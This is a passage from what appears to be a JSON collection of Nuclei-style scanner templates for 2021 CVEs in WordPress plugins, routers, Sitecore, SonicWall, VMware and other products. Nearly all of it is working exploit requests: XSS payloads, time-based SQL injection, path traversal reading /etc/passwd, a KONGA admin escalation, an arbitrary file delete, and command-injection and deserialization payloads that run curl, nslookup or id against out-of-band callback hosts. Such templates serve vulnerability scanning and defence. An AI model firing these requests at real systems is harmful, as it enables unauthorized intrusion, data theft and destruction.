/v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site 